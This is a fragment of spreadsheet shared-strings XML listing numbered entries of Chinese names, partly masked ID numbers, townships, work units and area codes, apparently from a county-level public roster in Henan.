  </si>
  <si>
    <t>2331</t>
  </si>
  <si>
    <t>胡长敏</t>
  </si>
  <si>
    <t>412921********3329</t>
  </si>
  <si>
    <t>2332</t>
  </si>
  <si>
    <t>马肖</t>
  </si>
  <si>
    <t>411326********3340</t>
  </si>
  <si>
    <t>2333</t>
  </si>
  <si>
    <t>黄振昌</t>
  </si>
  <si>
    <t>411326********3493</t>
  </si>
  <si>
    <t>2334</t>
  </si>
  <si>
    <t>粮食局</t>
  </si>
  <si>
    <t>郭国元</t>
  </si>
  <si>
    <t>2335</t>
  </si>
  <si>
    <t>胡群</t>
  </si>
  <si>
    <t>412921********3335</t>
  </si>
  <si>
    <t>2336</t>
  </si>
  <si>
    <t>郑婉娜</t>
  </si>
  <si>
    <t>412902********2302</t>
  </si>
  <si>
    <t>2337</t>
  </si>
  <si>
    <t>杨庆旺</t>
  </si>
  <si>
    <t>410304********0515</t>
  </si>
  <si>
    <t>2338</t>
  </si>
  <si>
    <t>杨召静</t>
  </si>
  <si>
    <t>411326********3645</t>
  </si>
  <si>
    <t>2024年2月</t>
  </si>
  <si>
    <t>2339</t>
  </si>
  <si>
    <t>黄海</t>
  </si>
  <si>
    <t>411326********3338</t>
  </si>
  <si>
    <t>2340</t>
  </si>
  <si>
    <t>黄廷伟</t>
  </si>
  <si>
    <t>2341</t>
  </si>
  <si>
    <t>罗飞</t>
  </si>
  <si>
    <t>412921********3325</t>
  </si>
  <si>
    <t>2342</t>
  </si>
  <si>
    <t>电管所</t>
  </si>
  <si>
    <t>张钦泽</t>
  </si>
  <si>
    <t>411321********567X</t>
  </si>
  <si>
    <t>2343</t>
  </si>
  <si>
    <t>张含依</t>
  </si>
  <si>
    <t>411321********3324</t>
  </si>
  <si>
    <t>2344</t>
  </si>
  <si>
    <t>五朵镇</t>
  </si>
  <si>
    <t>四棵树乡</t>
  </si>
  <si>
    <t>闫中霞</t>
  </si>
  <si>
    <t>412921********4023</t>
  </si>
  <si>
    <t>4113211125</t>
  </si>
  <si>
    <t>2345</t>
  </si>
  <si>
    <t>黄运甫</t>
  </si>
  <si>
    <t>412921********4039</t>
  </si>
  <si>
    <t>2346</t>
  </si>
  <si>
    <t>李贵荣</t>
  </si>
  <si>
    <t>412921********4026</t>
  </si>
  <si>
    <t>2347</t>
  </si>
  <si>
    <t>田子庆</t>
  </si>
  <si>
    <t>412921********4015</t>
  </si>
  <si>
    <t>2348</t>
  </si>
  <si>
    <t>翟文良</t>
  </si>
  <si>
    <t>412921********4012</t>
  </si>
  <si>
    <t>2349</t>
  </si>
  <si>
    <t>田华苗</t>
  </si>
  <si>
    <t>412921********4044</t>
  </si>
  <si>
    <t>2350</t>
  </si>
  <si>
    <t>翟建皓</t>
  </si>
  <si>
    <t>411321********4038</t>
  </si>
  <si>
    <t>2351</t>
  </si>
  <si>
    <t>田广瑞</t>
  </si>
  <si>
    <t>412921********4055</t>
  </si>
  <si>
    <t>2352</t>
  </si>
  <si>
    <t>2353</t>
  </si>
  <si>
    <t>李德群</t>
  </si>
  <si>
    <t>412921********4034</t>
  </si>
  <si>
    <t>2354</t>
  </si>
  <si>
    <t>陈贞莲</t>
  </si>
  <si>
    <t>412921********4020</t>
  </si>
  <si>
    <t>2355</t>
  </si>
  <si>
    <t>杨付全</t>
  </si>
  <si>
    <t>412921********4014</t>
  </si>
  <si>
    <t>2356</t>
  </si>
  <si>
    <t>翟成云</t>
  </si>
  <si>
    <t>412921********4089</t>
  </si>
  <si>
    <t>2357</t>
  </si>
  <si>
    <t>杨祥云</t>
  </si>
  <si>
    <t>411321********485X</t>
  </si>
  <si>
    <t>2358</t>
  </si>
  <si>
    <t>陈正霞</t>
  </si>
  <si>
    <t>412921********4021</t>
  </si>
  <si>
    <t>2359</t>
  </si>
  <si>
    <t>田子玲</t>
  </si>
  <si>
    <t>2360</t>
  </si>
  <si>
    <t>田子献</t>
  </si>
  <si>
    <t>412921********4096</t>
  </si>
  <si>
    <t>2361</t>
  </si>
  <si>
    <t>李廷芳</t>
  </si>
  <si>
    <t>2362</t>
  </si>
  <si>
    <t>李德朝</t>
  </si>
  <si>
    <t>412921********4010</t>
  </si>
  <si>
    <t>2363</t>
  </si>
  <si>
    <t>张庆玲</t>
  </si>
  <si>
    <t>411326********4065</t>
  </si>
  <si>
    <t>2364</t>
  </si>
  <si>
    <t>田广林</t>
  </si>
  <si>
    <t>412921********4013</t>
  </si>
  <si>
    <t>2365</t>
  </si>
  <si>
    <t>王清芳</t>
  </si>
  <si>
    <t>412921********4029</t>
  </si>
  <si>
    <t>2366</t>
  </si>
  <si>
    <t>田广新</t>
  </si>
  <si>
    <t>412921********4083</t>
  </si>
  <si>
    <t>2367</t>
  </si>
  <si>
    <t>黄振海</t>
  </si>
  <si>
    <t>2368</t>
  </si>
  <si>
    <t>张荣芳</t>
  </si>
  <si>
    <t>412921********4045</t>
  </si>
  <si>
    <t>2369</t>
  </si>
  <si>
    <t>王荣</t>
  </si>
  <si>
    <t>412921********4060</t>
  </si>
  <si>
    <t>4113211124</t>
  </si>
  <si>
    <t>2370</t>
  </si>
  <si>
    <t>杨付有</t>
  </si>
  <si>
    <t>412921********4058</t>
  </si>
  <si>
    <t>2371</t>
  </si>
  <si>
    <t>席天玉</t>
  </si>
  <si>
    <t>2372</t>
  </si>
  <si>
    <t>黄秀梅</t>
  </si>
  <si>
    <t>412921********4067</t>
  </si>
  <si>
    <t>2373</t>
  </si>
  <si>
    <t>崔长梅</t>
  </si>
  <si>
    <t>2374</t>
  </si>
  <si>
    <t>李瑞娟</t>
  </si>
  <si>
    <t>412921********0623</t>
  </si>
  <si>
    <t>2375</t>
  </si>
  <si>
    <t>张建鹏</t>
  </si>
  <si>
    <t>2376</t>
  </si>
  <si>
    <t>杨贵兰</t>
  </si>
  <si>
    <t>412921********4022</t>
  </si>
  <si>
    <t>2377</t>
  </si>
  <si>
    <t>黄天春</t>
  </si>
  <si>
    <t>2378</t>
  </si>
  <si>
    <t>杨寿华</t>
  </si>
  <si>
    <t>412921********4063</t>
  </si>
  <si>
    <t>2379</t>
  </si>
  <si>
    <t>412921********402X</t>
  </si>
  <si>
    <t>2380</t>
  </si>
  <si>
    <t xml:space="preserve">田舒飒 </t>
  </si>
  <si>
    <t>411326********4029</t>
  </si>
  <si>
    <t>2381</t>
  </si>
  <si>
    <t>高书梅</t>
  </si>
  <si>
    <t>412921********4107</t>
  </si>
  <si>
    <t>2382</t>
  </si>
  <si>
    <t>薛传勤</t>
  </si>
  <si>
    <t>412921********4127</t>
  </si>
  <si>
    <t>2383</t>
  </si>
  <si>
    <t>田广政</t>
  </si>
  <si>
    <t>2384</t>
  </si>
  <si>
    <t>张兆生</t>
  </si>
  <si>
    <t>2385</t>
  </si>
  <si>
    <t>田广霞</t>
  </si>
  <si>
    <t>2386</t>
  </si>
  <si>
    <t>李荣义</t>
  </si>
  <si>
    <t>412921********4037</t>
  </si>
  <si>
    <t>2387</t>
  </si>
  <si>
    <t>张建娥</t>
  </si>
  <si>
    <t>412921********4066</t>
  </si>
  <si>
    <t>2388</t>
  </si>
  <si>
    <t>张新林</t>
  </si>
  <si>
    <t>412921********4019</t>
  </si>
  <si>
    <t>2389</t>
  </si>
  <si>
    <t>朱晓灵</t>
  </si>
  <si>
    <t>2390</t>
  </si>
  <si>
    <t>田广杰</t>
  </si>
  <si>
    <t>2391</t>
  </si>
  <si>
    <t>渠营</t>
  </si>
  <si>
    <t>412901********0503</t>
  </si>
  <si>
    <t>4113211105</t>
  </si>
  <si>
    <t>2392</t>
  </si>
  <si>
    <t>翟文玲</t>
  </si>
  <si>
    <t>2393</t>
  </si>
  <si>
    <t>杨勇</t>
  </si>
  <si>
    <t>2394</t>
  </si>
  <si>
    <t>廖敬雷</t>
  </si>
  <si>
    <t>411326********4039</t>
  </si>
  <si>
    <t>2395</t>
  </si>
  <si>
    <t>王霞</t>
  </si>
  <si>
    <t>2396</t>
  </si>
  <si>
    <t>孙运明</t>
  </si>
  <si>
    <t>412921********401X</t>
  </si>
  <si>
    <t>2397</t>
  </si>
  <si>
    <t>杨新转</t>
  </si>
  <si>
    <t>2398</t>
  </si>
  <si>
    <t>赵玉林</t>
  </si>
  <si>
    <t>2399</t>
  </si>
  <si>
    <t>张庆昌</t>
  </si>
  <si>
    <t>412921********3635</t>
  </si>
  <si>
    <t>2400</t>
  </si>
  <si>
    <t>黄鑫雨</t>
  </si>
  <si>
    <t>411326********4036</t>
  </si>
  <si>
    <t>2401</t>
  </si>
  <si>
    <t>赵怀广</t>
  </si>
  <si>
    <t>412921********4077</t>
  </si>
  <si>
    <t>2402</t>
  </si>
  <si>
    <t>席天玲</t>
  </si>
  <si>
    <t>412921********4125</t>
  </si>
  <si>
    <t>2403</t>
  </si>
  <si>
    <t>齐森</t>
  </si>
  <si>
    <t>411326********4017</t>
  </si>
  <si>
    <t>2404</t>
  </si>
  <si>
    <t>赵国基</t>
  </si>
  <si>
    <t>2405</t>
  </si>
  <si>
    <t>赵烜</t>
  </si>
  <si>
    <t>411321********4014</t>
  </si>
  <si>
    <t>2406</t>
  </si>
  <si>
    <t>2407</t>
  </si>
  <si>
    <t>瓦渣岭</t>
  </si>
  <si>
    <t>叶光</t>
  </si>
  <si>
    <t>4113211120</t>
  </si>
  <si>
    <t>2408</t>
  </si>
  <si>
    <t>疙瘩坡村</t>
  </si>
  <si>
    <t>张雅迪</t>
  </si>
  <si>
    <t>411321********0328</t>
  </si>
  <si>
    <t>4113211119</t>
  </si>
  <si>
    <t>2409</t>
  </si>
  <si>
    <t>翟传飞</t>
  </si>
  <si>
    <t>412921********4018</t>
  </si>
  <si>
    <t>2410</t>
  </si>
  <si>
    <t>外贸局</t>
  </si>
  <si>
    <t>2411</t>
  </si>
  <si>
    <t>南河店镇</t>
  </si>
  <si>
    <t>王满瑞</t>
  </si>
  <si>
    <t>412921********3666</t>
  </si>
  <si>
    <t>4113211003</t>
  </si>
  <si>
    <t>2412</t>
  </si>
  <si>
    <t>赵霞</t>
  </si>
  <si>
    <t>412921********3649</t>
  </si>
  <si>
    <t>4113211004</t>
  </si>
  <si>
    <t>2413</t>
  </si>
  <si>
    <t>韩付芝</t>
  </si>
  <si>
    <t>2414</t>
  </si>
  <si>
    <t>孙运果</t>
  </si>
  <si>
    <t>412921********3615</t>
  </si>
  <si>
    <t>2415</t>
  </si>
  <si>
    <t>孙建勋</t>
  </si>
  <si>
    <t>411321********3614</t>
  </si>
  <si>
    <t>2416</t>
  </si>
  <si>
    <t>王景珩</t>
  </si>
  <si>
    <t>411322********0159</t>
  </si>
  <si>
    <t>2417</t>
  </si>
  <si>
    <t>毛金生</t>
  </si>
  <si>
    <t>4113211014</t>
  </si>
  <si>
    <t>2418</t>
  </si>
  <si>
    <t>李敬霞</t>
  </si>
  <si>
    <t>412921********3621</t>
  </si>
  <si>
    <t>2419</t>
  </si>
  <si>
    <t>李红依</t>
  </si>
  <si>
    <t>411321********3648</t>
  </si>
  <si>
    <t>2420</t>
  </si>
  <si>
    <t>杨书荣</t>
  </si>
  <si>
    <t>412921********3643</t>
  </si>
  <si>
    <t>2421</t>
  </si>
  <si>
    <t>蚕厂家属院</t>
  </si>
  <si>
    <t>翟世丽</t>
  </si>
  <si>
    <t>412921********0465</t>
  </si>
  <si>
    <t>4113211009</t>
  </si>
  <si>
    <t>2422</t>
  </si>
  <si>
    <t>焦治原</t>
  </si>
  <si>
    <t>411326********3615</t>
  </si>
  <si>
    <t>2423</t>
  </si>
  <si>
    <t>张庆恒</t>
  </si>
  <si>
    <t>412921********3652</t>
  </si>
  <si>
    <t>2424</t>
  </si>
  <si>
    <t>李琛</t>
  </si>
  <si>
    <t>412921********3613</t>
  </si>
  <si>
    <t>4113211007</t>
  </si>
  <si>
    <t>2425</t>
  </si>
  <si>
    <t>李月</t>
  </si>
  <si>
    <t>2426</t>
  </si>
  <si>
    <t>李建</t>
  </si>
  <si>
    <t>412921********3630</t>
  </si>
  <si>
    <t>2427</t>
  </si>
  <si>
    <t>李长健</t>
  </si>
  <si>
    <t>2428</t>
  </si>
  <si>
    <t>杨德荣</t>
  </si>
  <si>
    <t>412921********362X</t>
  </si>
  <si>
    <t>2429</t>
  </si>
  <si>
    <t>孙运超</t>
  </si>
  <si>
    <t>412921********0232</t>
  </si>
  <si>
    <t>2430</t>
  </si>
  <si>
    <t>张广东</t>
  </si>
  <si>
    <t>412921********3612</t>
  </si>
  <si>
    <t>2431</t>
  </si>
  <si>
    <t>张世豪</t>
  </si>
  <si>
    <t>2432</t>
  </si>
  <si>
    <t>刘长贵</t>
  </si>
  <si>
    <t>2433</t>
  </si>
  <si>
    <t>蚕业局</t>
  </si>
  <si>
    <t>马旭</t>
  </si>
  <si>
    <t>2434</t>
  </si>
  <si>
    <t>姬雅卓</t>
  </si>
  <si>
    <t>411326********0046</t>
  </si>
  <si>
    <t>2435</t>
  </si>
  <si>
    <t>马荣品</t>
  </si>
  <si>
    <t>412921********3669</t>
  </si>
  <si>
    <t>2436</t>
  </si>
  <si>
    <t>杨冰</t>
  </si>
  <si>
    <t>2437</t>
  </si>
  <si>
    <t>杨晓宇</t>
  </si>
  <si>
    <t>411321********362X</t>
  </si>
  <si>
    <t>2438</t>
  </si>
  <si>
    <t>工信局</t>
  </si>
  <si>
    <t>胡进明</t>
  </si>
  <si>
    <t>412921********361X</t>
  </si>
  <si>
    <t>2439</t>
  </si>
  <si>
    <t>朱保彦</t>
  </si>
  <si>
    <t>2440</t>
  </si>
  <si>
    <t>李泉</t>
  </si>
  <si>
    <t>412921********3632</t>
  </si>
  <si>
    <t>2441</t>
  </si>
  <si>
    <t>邢远朝</t>
  </si>
  <si>
    <t>2442</t>
  </si>
  <si>
    <t>赵天超</t>
  </si>
  <si>
    <t>4113211001</t>
  </si>
  <si>
    <t>2443</t>
  </si>
  <si>
    <t>宰来均</t>
  </si>
  <si>
    <t>412921********3617</t>
  </si>
  <si>
    <t>2444</t>
  </si>
  <si>
    <t>武建</t>
  </si>
  <si>
    <t>412921********4813</t>
  </si>
  <si>
    <t>4113211020</t>
  </si>
  <si>
    <t>2445</t>
  </si>
  <si>
    <t>王立</t>
  </si>
  <si>
    <t>412921********3654</t>
  </si>
  <si>
    <t>2446</t>
  </si>
  <si>
    <t>苗莺兰</t>
  </si>
  <si>
    <t>412921********3624</t>
  </si>
  <si>
    <t>2447</t>
  </si>
  <si>
    <t>412921********3633</t>
  </si>
  <si>
    <t>2448</t>
  </si>
  <si>
    <t>马哲欣</t>
  </si>
  <si>
    <t>2449</t>
  </si>
  <si>
    <t>王新华</t>
  </si>
  <si>
    <t>2450</t>
  </si>
  <si>
    <t>马春雨</t>
  </si>
  <si>
    <t>411326********0105</t>
  </si>
  <si>
    <t>2451</t>
  </si>
  <si>
    <t>贺振邦</t>
  </si>
  <si>
    <t>412921********4410</t>
  </si>
  <si>
    <t>2452</t>
  </si>
  <si>
    <t>李永法</t>
  </si>
  <si>
    <t>412921********3678</t>
  </si>
  <si>
    <t>2453</t>
  </si>
  <si>
    <t>曾祥付</t>
  </si>
  <si>
    <t>411326********375X</t>
  </si>
  <si>
    <t>2454</t>
  </si>
  <si>
    <t>高杨</t>
  </si>
  <si>
    <t>2455</t>
  </si>
  <si>
    <t>祖克锗</t>
  </si>
  <si>
    <t>411324********001X</t>
  </si>
  <si>
    <t>2456</t>
  </si>
  <si>
    <t>李勇</t>
  </si>
  <si>
    <t>412921********3636</t>
  </si>
  <si>
    <t>2457</t>
  </si>
  <si>
    <t>李兵</t>
  </si>
  <si>
    <t>412921********3658</t>
  </si>
  <si>
    <t>2458</t>
  </si>
  <si>
    <t>赵国</t>
  </si>
  <si>
    <t>2459</t>
  </si>
  <si>
    <t>赵峻皓</t>
  </si>
  <si>
    <t>411321********365X</t>
  </si>
  <si>
    <t>2460</t>
  </si>
  <si>
    <t>卫心同</t>
  </si>
  <si>
    <t>2461</t>
  </si>
  <si>
    <t>牛付春</t>
  </si>
  <si>
    <t>412921********4439</t>
  </si>
  <si>
    <t>4113211005</t>
  </si>
  <si>
    <t>2462</t>
  </si>
  <si>
    <t>马良伟</t>
  </si>
  <si>
    <t>412921********4457</t>
  </si>
  <si>
    <t>2463</t>
  </si>
  <si>
    <t>姬明粮</t>
  </si>
  <si>
    <t>2464</t>
  </si>
  <si>
    <t>物资局</t>
  </si>
  <si>
    <t>尚德京</t>
  </si>
  <si>
    <t>4113211018</t>
  </si>
  <si>
    <t>2465</t>
  </si>
  <si>
    <t>甘广东</t>
  </si>
  <si>
    <t>2023年10月</t>
  </si>
  <si>
    <t>2466</t>
  </si>
  <si>
    <t>张林林</t>
  </si>
  <si>
    <t>2467</t>
  </si>
  <si>
    <t>张栋威</t>
  </si>
  <si>
    <t>411321********3637</t>
  </si>
  <si>
    <t>2468</t>
  </si>
  <si>
    <t>张紫雯</t>
  </si>
  <si>
    <t>411321********3629</t>
  </si>
  <si>
    <t>2469</t>
  </si>
  <si>
    <t>钾长石矿</t>
  </si>
  <si>
    <t>曾凡群</t>
  </si>
  <si>
    <t>2470</t>
  </si>
  <si>
    <t>侯明森</t>
  </si>
  <si>
    <t>2471</t>
  </si>
  <si>
    <t>医药部</t>
  </si>
  <si>
    <t>王净远</t>
  </si>
  <si>
    <t>2472</t>
  </si>
  <si>
    <t>赵丽</t>
  </si>
  <si>
    <t>411326********4024</t>
  </si>
  <si>
    <t>2473</t>
  </si>
  <si>
    <t>南河店镇范庄村</t>
  </si>
  <si>
    <t>边峰</t>
  </si>
  <si>
    <t>411321********3655</t>
  </si>
  <si>
    <t>2474</t>
  </si>
  <si>
    <t>边俊博</t>
  </si>
  <si>
    <t>411321********3657</t>
  </si>
  <si>
    <t>2475</t>
  </si>
  <si>
    <t>农机配件厂</t>
  </si>
  <si>
    <t>邢远贞</t>
  </si>
  <si>
    <t>412921********445X</t>
  </si>
  <si>
    <t>2476</t>
  </si>
  <si>
    <t>贺华</t>
  </si>
  <si>
    <t>412921********3705</t>
  </si>
  <si>
    <t>2477</t>
  </si>
  <si>
    <t>全小强</t>
  </si>
  <si>
    <t>2478</t>
  </si>
  <si>
    <t>白土岗镇</t>
  </si>
  <si>
    <t>马玉祥</t>
  </si>
  <si>
    <t>411321********441X</t>
  </si>
  <si>
    <t>411321122001</t>
  </si>
  <si>
    <t>2479</t>
  </si>
  <si>
    <t>李丰昌</t>
  </si>
  <si>
    <t>412921********4453</t>
  </si>
  <si>
    <t>2480</t>
  </si>
  <si>
    <t>张居军</t>
  </si>
  <si>
    <t>412921********4417</t>
  </si>
  <si>
    <t>2481</t>
  </si>
  <si>
    <t>吴太平</t>
  </si>
  <si>
    <t>412921********4445</t>
  </si>
  <si>
    <t>2482</t>
  </si>
  <si>
    <t>董悦</t>
  </si>
  <si>
    <t>412921********4431</t>
  </si>
  <si>
    <t>2483</t>
  </si>
  <si>
    <t>马明英</t>
  </si>
  <si>
    <t>2484</t>
  </si>
  <si>
    <t>邢明现</t>
  </si>
  <si>
    <t>412901********503X</t>
  </si>
  <si>
    <t>2485</t>
  </si>
  <si>
    <t>刘三贵</t>
  </si>
  <si>
    <t>412921********4437</t>
  </si>
  <si>
    <t>2486</t>
  </si>
  <si>
    <t>候太顺</t>
  </si>
  <si>
    <t>412921********443X</t>
  </si>
  <si>
    <t>2487</t>
  </si>
  <si>
    <t>候璎育</t>
  </si>
  <si>
    <t>411321********5207</t>
  </si>
  <si>
    <t>2488</t>
  </si>
  <si>
    <t>王壮</t>
  </si>
  <si>
    <t>411326********4451</t>
  </si>
  <si>
    <t>2489</t>
  </si>
  <si>
    <t>刘玉</t>
  </si>
  <si>
    <t>412921********4425</t>
  </si>
  <si>
    <t>2490</t>
  </si>
  <si>
    <t>孟遥</t>
  </si>
  <si>
    <t>2491</t>
  </si>
  <si>
    <t>2492</t>
  </si>
  <si>
    <t>谢俊</t>
  </si>
  <si>
    <t>2493</t>
  </si>
  <si>
    <t>张天云</t>
  </si>
  <si>
    <t>412921********4485</t>
  </si>
  <si>
    <t>2494</t>
  </si>
  <si>
    <t>张新武</t>
  </si>
  <si>
    <t>412921********4415</t>
  </si>
  <si>
    <t>2495</t>
  </si>
  <si>
    <t>谢银平</t>
  </si>
  <si>
    <t>2496</t>
  </si>
  <si>
    <t>张新江</t>
  </si>
  <si>
    <t>412921********4515</t>
  </si>
  <si>
    <t>2497</t>
  </si>
  <si>
    <t>张天星</t>
  </si>
  <si>
    <t>411326********4439</t>
  </si>
  <si>
    <t>2498</t>
  </si>
  <si>
    <t>尹延峰</t>
  </si>
  <si>
    <t>411326********4411</t>
  </si>
  <si>
    <t>2499</t>
  </si>
  <si>
    <t>白土岗镇校委会</t>
  </si>
  <si>
    <t>李广朝</t>
  </si>
  <si>
    <t>412901********1513</t>
  </si>
  <si>
    <t>2500</t>
  </si>
  <si>
    <t>白土岗镇供销社</t>
  </si>
  <si>
    <t>曾祥晓</t>
  </si>
  <si>
    <t>412921********4475</t>
  </si>
  <si>
    <t>2501</t>
  </si>
  <si>
    <t>张学顺</t>
  </si>
  <si>
    <t>2024年3月</t>
  </si>
  <si>
    <t>2502</t>
  </si>
  <si>
    <t>张成铁</t>
  </si>
  <si>
    <t>412921********4419</t>
  </si>
  <si>
    <t>2503</t>
  </si>
  <si>
    <t>张雅姿</t>
  </si>
  <si>
    <t>411321********442X</t>
  </si>
  <si>
    <t>2504</t>
  </si>
  <si>
    <t>张召普</t>
  </si>
  <si>
    <t>2505</t>
  </si>
  <si>
    <t>刘振克</t>
  </si>
  <si>
    <t>2506</t>
  </si>
  <si>
    <t>板山坪镇</t>
  </si>
  <si>
    <t>赵长玉</t>
  </si>
  <si>
    <t>412921********4912</t>
  </si>
  <si>
    <t>411321130801</t>
  </si>
  <si>
    <t>2507</t>
  </si>
  <si>
    <t>王守成</t>
  </si>
  <si>
    <t>411326********4812</t>
  </si>
  <si>
    <t>2508</t>
  </si>
  <si>
    <t>郑喜成</t>
  </si>
  <si>
    <t>2509</t>
  </si>
  <si>
    <t>板山坪村</t>
  </si>
  <si>
    <t>王娟</t>
  </si>
  <si>
    <t>411326********4842</t>
  </si>
  <si>
    <t>2510</t>
  </si>
  <si>
    <t>高良溥</t>
  </si>
  <si>
    <t>411326********4816</t>
  </si>
  <si>
    <t>2511</t>
  </si>
  <si>
    <t>乔端镇</t>
  </si>
  <si>
    <t>张小敏</t>
  </si>
  <si>
    <t>4113211407</t>
  </si>
  <si>
    <t>2512</t>
  </si>
  <si>
    <t>张景玲</t>
  </si>
  <si>
    <t>412921********586X</t>
  </si>
  <si>
    <t>2513</t>
  </si>
  <si>
    <t>彭得立</t>
  </si>
  <si>
    <t>412921********5853</t>
  </si>
  <si>
    <t>2514</t>
  </si>
  <si>
    <t>孙文伟</t>
  </si>
  <si>
    <t>412921********5819</t>
  </si>
  <si>
    <t>2515</t>
  </si>
  <si>
    <t>412921********582X</t>
  </si>
  <si>
    <t>2516</t>
  </si>
  <si>
    <t>王新荣</t>
  </si>
  <si>
    <t>412921********5822</t>
  </si>
  <si>
    <t>2517</t>
  </si>
  <si>
    <t>卫生局</t>
  </si>
  <si>
    <t>张豪</t>
  </si>
  <si>
    <t>411326********5816</t>
  </si>
  <si>
    <t>2518</t>
  </si>
  <si>
    <t>裴来明</t>
  </si>
  <si>
    <t>412921********5837</t>
  </si>
  <si>
    <t>2519</t>
  </si>
  <si>
    <t>杨翠平</t>
  </si>
  <si>
    <t>411321********5824</t>
  </si>
  <si>
    <t>411321140101</t>
  </si>
  <si>
    <t>2520</t>
  </si>
  <si>
    <t>李秀军</t>
  </si>
  <si>
    <t>412921********5812</t>
  </si>
  <si>
    <t>2521</t>
  </si>
  <si>
    <t>苗学广</t>
  </si>
  <si>
    <t>412921********581X</t>
  </si>
  <si>
    <t>2522</t>
  </si>
  <si>
    <t>王小双</t>
  </si>
  <si>
    <t>2523</t>
  </si>
  <si>
    <t>马市坪乡</t>
  </si>
  <si>
    <t>徐国强</t>
  </si>
  <si>
    <t>412921********5513</t>
  </si>
  <si>
    <t>2524</t>
  </si>
  <si>
    <t>王支丽</t>
  </si>
  <si>
    <t>2525</t>
  </si>
  <si>
    <t>孙中玲</t>
  </si>
  <si>
    <t>412921********5543</t>
  </si>
  <si>
    <t>2526</t>
  </si>
  <si>
    <t>邵青运</t>
  </si>
  <si>
    <t>412921********5510</t>
  </si>
  <si>
    <t>2527</t>
  </si>
  <si>
    <t>尚红燕</t>
  </si>
  <si>
    <t>652901********4029</t>
  </si>
  <si>
    <t>2528</t>
  </si>
  <si>
    <t>刘长青</t>
  </si>
  <si>
    <t>412921********5561</t>
  </si>
  <si>
    <t>2529</t>
  </si>
  <si>
    <t>吕炎</t>
  </si>
  <si>
    <t>411326********5515</t>
  </si>
  <si>
    <t>2530</t>
  </si>
  <si>
    <t>何庆超</t>
  </si>
  <si>
    <t>412921********5518</t>
  </si>
  <si>
    <t>2531</t>
  </si>
  <si>
    <t>刘金堂</t>
  </si>
  <si>
    <t>412921********5557</t>
  </si>
  <si>
    <t>2532</t>
  </si>
  <si>
    <t>陈天骄</t>
  </si>
  <si>
    <t>411321********5521</t>
  </si>
  <si>
    <t>2533</t>
  </si>
  <si>
    <t>综合厂</t>
  </si>
  <si>
    <t>王长宽</t>
  </si>
  <si>
    <t>412921********551X</t>
  </si>
  <si>
    <t>2534</t>
  </si>
  <si>
    <t>郑九兰</t>
  </si>
  <si>
    <t>412921********5525</t>
  </si>
  <si>
    <t>2535</t>
  </si>
  <si>
    <t>靳涛</t>
  </si>
  <si>
    <t>412921********5512</t>
  </si>
  <si>
    <t>2536</t>
  </si>
  <si>
    <t>崔庄乡</t>
  </si>
  <si>
    <t>李延瑞</t>
  </si>
  <si>
    <t>4113211615</t>
  </si>
  <si>
    <t>2537</t>
  </si>
  <si>
    <t>沈朝永</t>
  </si>
  <si>
    <t>412921********5194</t>
  </si>
  <si>
    <t>4113211699</t>
  </si>
  <si>
    <t>2538</t>
  </si>
  <si>
    <t>黄志现</t>
  </si>
  <si>
    <t>412921********5137</t>
  </si>
  <si>
    <t>4113211605</t>
  </si>
  <si>
    <t>2539</t>
  </si>
  <si>
    <t>梁付强</t>
  </si>
  <si>
    <t>412921********5158</t>
  </si>
  <si>
    <t>2540</t>
  </si>
  <si>
    <t>赵国静</t>
  </si>
  <si>
    <t>411303********1543</t>
  </si>
  <si>
    <t>4113211616</t>
  </si>
  <si>
    <t>2541</t>
  </si>
  <si>
    <t>张紫芃</t>
  </si>
  <si>
    <t>411326********2450</t>
  </si>
  <si>
    <t>2542</t>
  </si>
  <si>
    <t>张建坤</t>
  </si>
  <si>
    <t>411326********5110</t>
  </si>
  <si>
    <t>2543</t>
  </si>
  <si>
    <t>崔庄乡政府</t>
  </si>
  <si>
    <t>杨海坡</t>
  </si>
  <si>
    <t>411002********1032</t>
  </si>
  <si>
    <t>4113211607</t>
  </si>
  <si>
    <t>2023年8月</t>
  </si>
  <si>
    <t>2544</t>
  </si>
  <si>
    <t>崔庄供销社</t>
  </si>
  <si>
    <t>贺保玉</t>
  </si>
  <si>
    <t>412921********5139</t>
  </si>
  <si>
    <t>4113211610</t>
  </si>
  <si>
    <t>2023年12月</t>
  </si>
  <si>
    <t>2545</t>
  </si>
  <si>
    <t>水文站</t>
  </si>
  <si>
    <t>王启帆</t>
  </si>
  <si>
    <t>411321********0196</t>
  </si>
  <si>
    <t>4113211611</t>
  </si>
  <si>
    <t>2546</t>
  </si>
  <si>
    <t>魏宰</t>
  </si>
  <si>
    <t>411326********5132</t>
  </si>
  <si>
    <t>2547</t>
  </si>
  <si>
    <t>李平</t>
  </si>
  <si>
    <t>412921********5134</t>
  </si>
  <si>
    <t>2548</t>
  </si>
  <si>
    <t>乡政府家属院</t>
  </si>
  <si>
    <t>朱延华</t>
  </si>
  <si>
    <t>2549</t>
  </si>
  <si>
    <t>闫建华</t>
  </si>
  <si>
    <t>2550</t>
  </si>
  <si>
    <t>军工办</t>
  </si>
  <si>
    <t>红阳厂社区</t>
  </si>
  <si>
    <t>王淑琴</t>
  </si>
  <si>
    <t>2551</t>
  </si>
  <si>
    <t>苏媛媛</t>
  </si>
  <si>
    <t>411326********2028</t>
  </si>
  <si>
    <t>2552</t>
  </si>
  <si>
    <t>闫星阁</t>
  </si>
  <si>
    <t>2553</t>
  </si>
  <si>
    <t>王化太</t>
  </si>
  <si>
    <t>412921********2857</t>
  </si>
  <si>
    <t>2554</t>
  </si>
  <si>
    <t>王建国</t>
  </si>
  <si>
    <t>2555</t>
  </si>
  <si>
    <t>张蔚明</t>
  </si>
  <si>
    <t>2556</t>
  </si>
  <si>
    <t>别桂林</t>
  </si>
  <si>
    <t>2557</t>
  </si>
  <si>
    <t>朱清华</t>
  </si>
  <si>
    <t>2558</t>
  </si>
  <si>
    <t>赵彬</t>
  </si>
  <si>
    <t>411326********201X</t>
  </si>
  <si>
    <t>2559</t>
  </si>
  <si>
    <t>杨枝山</t>
  </si>
  <si>
    <t>411326********203X</t>
  </si>
  <si>
    <t>2560</t>
  </si>
  <si>
    <t>周金苹</t>
  </si>
  <si>
    <t>2561</t>
  </si>
  <si>
    <t>王建勤</t>
  </si>
  <si>
    <t>2562</t>
  </si>
  <si>
    <t>朱广秀</t>
  </si>
  <si>
    <t>411326********2021</t>
  </si>
  <si>
    <t>2563</t>
  </si>
  <si>
    <t>丁素雪</t>
  </si>
  <si>
    <t>2564</t>
  </si>
  <si>
    <t>倪浩源</t>
  </si>
  <si>
    <t>411321********0230</t>
  </si>
  <si>
    <t>2565</t>
  </si>
  <si>
    <t>倪珑芮</t>
  </si>
  <si>
    <t>2566</t>
  </si>
  <si>
    <t>纪宁</t>
  </si>
  <si>
    <t>411326********202X</t>
  </si>
  <si>
